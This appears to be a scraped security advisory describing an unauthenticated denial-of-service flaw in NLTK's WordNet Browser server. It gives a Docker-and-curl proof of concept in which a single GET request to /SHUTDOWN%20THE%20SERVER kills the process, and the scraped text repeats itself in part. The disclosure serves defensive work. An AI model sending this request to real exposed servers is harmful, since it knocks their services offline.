Summary
nltk.app.wordnet_app allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple GET /SHUTDOWN%20THE%20SERVER request causes the process to terminate immediately via os._exit(0), resulting in a denial of service.
Details
The vulnerable logic is in nltk/app/wordnet_app.py:
This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.
PoC
- Start the WordNet Browser in Docker in its default mode:
docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \
nltk-sandbox \
python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)"
- Confirm the service is reachable:
curl -s -o /tmp/wn_before.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'Observed result:
200
- Trigger shutdown:
curl -s -o /tmp/wn_shutdown.html -w '%{http_code}\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'Observed result:
000
- Verify the service is no longer available:
curl -s -o /tmp/wn_after.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'
docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\t{{.Status}}'
docker logs nltk-wordnet-web-default-retestObserved results:
000
nltk-wordnet-web-default-retest Exited (0)
Server shutting down!
Impact
This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.
Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:
- the route is accessible over HTTP
- no authentication or CSRF-style confirmation is required
- the server listens on all interfaces by default
- the process exits immediately instead of performing a controlled shutdown
This primarily affects users who run nltk.app.wordnet_app and expose or otherwise allow access to its listening port.
References
leduckhuong Reporter
Summary
nltk.app.wordnet_appallows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simpleGET /SHUTDOWN%20THE%20SERVERrequest causes the process to terminate immediately viaos._exit(0), resulting in a denial of service.Details
The vulnerable logic is in
nltk/app/wordnet_app.py:nltk/app/wordnet_app.py:242server = HTTPServer(("", port), MyServerHandler)nltk/app/wordnet_app.py:87if unquote_plus(sp) == "SHUTDOWN THE SERVER":nltk/app/wordnet_app.py:88server_modenltk/app/wordnet_app.py:93runBrowser=True, thereforeserver_mode=False), the handler terminates the process directly:os._exit(0)This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.
PoC
docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \ nltk-sandbox \ python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)"Observed result:
Observed result:
Observed results:
Impact
This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.
Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:
This primarily affects users who run
nltk.app.wordnet_appand expose or otherwise allow access to its listening port.References